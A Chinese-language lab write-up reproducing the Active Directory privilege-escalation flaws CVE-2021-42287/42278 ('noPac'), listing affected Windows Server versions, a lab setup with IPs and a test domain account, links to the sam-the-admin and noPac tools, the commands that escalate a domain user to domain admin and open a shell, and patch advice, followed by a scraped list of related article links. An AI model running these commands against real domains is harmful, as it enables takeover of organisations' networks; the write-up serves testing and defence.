1.漏洞描述

Windows域服务权限提升漏洞(CVE-2021-42287, CVE-2021-42278)是由于Active Directory 域服务没有进行适当的安全限制,导致可绕过安全限制进行权限提升。攻击者可利用该漏洞造成将域内的普通用户权限提升到域管理员权限等危害。

2.影响版本

CVE-2021-42287:

Windows Server 2012 R2 (Server Core installation)

Windows Server 2012 R2

Windows Server 2012 (Server Core installation)

Windows Server 2012

Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)

Windows Server 2008 R2 for x64-based Systems Service Pack 1

Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)

Windows Server 2008 for x64-based Systems Service Pack 2

Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)

Windows Server 2008 for 32-bit Systems Service Pack 2

Windows Server 2016 (Server Core installation)

Windows Server 2016

Windows Server, version 20H2 (Server Core Installation)

Windows Server, version 2004 (Server Core installation)

Windows Server 2022 (Server Core installation)

Windows Server 2022

Windows Server 2019 (Server Core installation)

Windows Server 2019

CVE-2021-42278:

Windows Server 2012 R2 (Server Core installation)

Windows Server 2012 R2

Windows Server 2012 (Server Core installation)

Windows Server 2012

Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)

Windows Server 2008 R2 for x64-based Systems Service Pack 1

Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)

Windows Server 2008 for x64-based Systems Service Pack 2

Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)

Windows Server 2008 for 32-bit Systems Service Pack 2

Windows Server 2016 (Server Core installation)

Windows Server 2016

Windows Server, version 20H2 (Server Core Installation)

Windows Server, version 2004 (Server Core installation)

Windows Server 2022 (Server Core installation)

Windows Server 2022

Windows Server 2019 (Server Core

3.漏洞利用条件

(1)一个普通域成员帐户

(2)域用户有创建机器用户的权限(一般默认权限)

(3)DC未打补丁KB5008380或KB5008602

4.环境准备

Win7

192.168.42.128

域普通用户:adtest/szg:1234qweR

Win server2008 R2 Standard Service Pack 1

192.168.42.136

域控机器

Kali

192.168.42.138

攻击机器

5.漏洞利用工具

下载地址:

https://github.com/WazeHell/sam-the-admin

https://github.com/Ridter/noPac

6.漏洞复现

sam-the-admin脚本

查看源码,发现脚本实际是实际就是调用两个可执行文件

kali中存在这两个文件的py文件,路径为/usr/local/bin/smbexec.py 和 /usr/local/bin/secretsdump.py

修改代码如下:

安装requirements.txt文件中的python模块

pip3 install -r requirements.txt

执行如下命令进行域服务提权攻击

python3 sam_the_admin.py "adtest/szg:1234qweR" -dc-ip 192.168.42.136 -shell

PS目前脚本只能在kali环境下运行成功。

noPac脚本

先安装requirements.txt文件中的模块

pip3 install -r requirements.txt

Scanner

python3 scanner.py -use-ldap adtest/szg:1234qweR -dc-ip 192.168.42.136

GetST

python3 noPac.py -use-ldap adtest/szg:1234qweR -dc-ip 192.168.42.136

Auto get shell

python3 noPac.py -use-ldap adtest/szg:1234qweR -dc-ip 192.168.42.136 –shell

7.修复建议

官方已发布漏洞补丁及修复版本,Windows用户可通过Windows update自动更新升级,或通过下述漏洞参考中的链接手动更新。

漏洞参考:

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-42287

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-42278

Windows域服务权限提升漏洞(CVE-2021-42287, CVE-2021-42278)相关推荐

  1. linux内核安全数据,【漏洞分析】Linux内核XFRM权限提升漏洞分析预警(CVE–2017–16939)...

    0x00 背景介绍 2017年11月24日, OSS社区披露了一个由独立安全研究员Mohamed Ghannam发现的一处存在于Linux 内核Netlink socket子系统(XFRM)的漏洞,漏 ...

  2. 【域渗透提权】CVE-2020-1472 NetLogon 权限提升漏洞

    文章目录 声明 一.漏洞概述 二.漏洞简介 三.影响范围 四.漏洞原理 五.实战攻击测试 POC/EXP攻击.Impacket工具包 使用 Mimikatz 进行攻击测试 六.恢复用户哈希 恢复域控的 ...

  3. Windows NetLogon权限提升漏洞(CVE-2020-1472)

    漏洞描述 微软官方于8月12日发布安全更新,其中修复了一个修复了NetLogon权限提升漏洞(CVE-2020-1472),攻击者通过NetLogon(MS-NRPC),建立与域控间易受攻击的安全通道 ...

  4. 【Windows Server 2019】活动目录 (Active Directory) ——安装Acitve Directory域服务和提升为域控制器

    目录 5. 安装 Active Directory 域服务 实验目的 5.1 配置服务器的IP地址 5.2 安装Active Diretory服务 (1)添加角色和功能 (2)进入[开始之前]界面 ( ...

  5. CVE-2020-1472 Netlogon权限提升漏洞分析

    一.漏洞信息 1. 漏洞简述 漏洞名称:Netlogon 权限提升漏洞 漏洞编号:CVE-2020-1472 漏洞类型:权限提升 CVSS评分:10 利用难度:简单 基础用户:不需要 2. 组件概述 ...

  6. netlogon启动后停止_【通告更新】漏洞EXP已流出,影响巨大,微软NetLogon权限提升漏洞安全风险通告第三次更新...

    近日,奇安信CERT监测到国外安全厂商发布了NetLogon 权限提升漏洞(CVE-2020-1472)的详细技术分析文章和验证脚本.此漏洞是微软8月份发布安全公告披露的紧急漏洞,CVSS漏洞评分10 ...

  7. CVE-2021-3560 Polkit权限提升漏洞复现与分析

    0x00 简介 Polkit是Linux上的一个系统服务,其用于实现权限管理,通过给非特权进程授权,允许具有特权的进程(或者库文件lib)给非特权进程提供服务,由于Polkit被systemd使用,所 ...

  8. linux ssh权限漏洞,OpenSSH do_setup_env函数权限提升漏洞(CVE-2015-8325)

    OpenSSH do_setup_env函数权限提升漏洞(CVE-2015-8325) 发布日期:2016-05-02 更新日期:2016-05-04 受影响系统:OpenSSH OpenSSH &l ...

  9. windows dns配置文件在哪_搭建基于Windows的域服务与文件服务(一)——搭建Windows域服务...

    Windows的域服务,准确来说应该叫Windows活动目录,是网络环境下各个Windows服务端.客户端的一种组织管理形式,利用Windows域服务,可以有效地对组织内的Windows电脑进行统一的 ...

  10. CVE-2020-1472NetLogon权限提升漏洞

    0x01 概述 2020年8月12日,阿里云应急响应中心监测到微软发布补丁修复了NetLogon权限提升漏洞(CVE-2020-1472),CVSS评分10,官方评级严重.攻击者通过NetLogon( ...

最新文章

  1. 低头是家和月光,抬头是车和远方
  2. jdbc template 学习总结
  3. [Java基础]模块化概述
  4. [react] React组件的构造函数有什么作用?
  5. C++静态联编与动态联编
  6. sendRedirec forward
  7. python程序实例讲解_python入门编程实例 python入门编程实例解析
  8. 关于RealProxy
  9. PMP-8. 项目经理的能力
  10. hdu2203java_HDU2203(KMP入门题)
  11. C语言一般考点笔试,c语言常见笔试题及答案
  12. 读书寄语:所有的遇见都是有原因的,并不只是偶然
  13. python数字转中文_阿拉伯数字转换为中文数字的python实现
  14. 做事很乱没有条理性,如何让自己做事更有条理?
  15. 【vcpkg】POCO库编译链接总结
  16. con和com开头单词规律_英语单词太多记不住?巧用思维导图打开单词记忆新大门...
  17. 【Guacamole中文文档】二、用户指南 —— 1.实现和架构
  18. pfSense设置入网门户
  19. 《嵌入式 - 嵌入式大杂烩》详解常见的二极管
  20. DVWA爆破high等级与token机制介绍(附防爆破措施)

热门文章

  1. 用计算机读取三菱PLC程序,电脑如何读取与保存三菱plc数据?
  2. Mybatis-Plus:Sql 注入器(扩展BaseMapper)
  3. Kvaser Memorator数据记录仪通过KVmlib配置和读取SD卡
  4. TI-TMS320F28335学习详解(2)::F28335片上资源详解
  5. 工具包diffmerge
  6. 机器学习评价指标 ROC与AUC 的理解和python实现
  7. 银行联行号cnasp查询(二)
  8. 版本控制工具 Git 和SVN 的区别
  9. QNX系统开启telnet远程登录
  10. 向日葵远程软件连接Ubuntu无法显示桌面之解决方案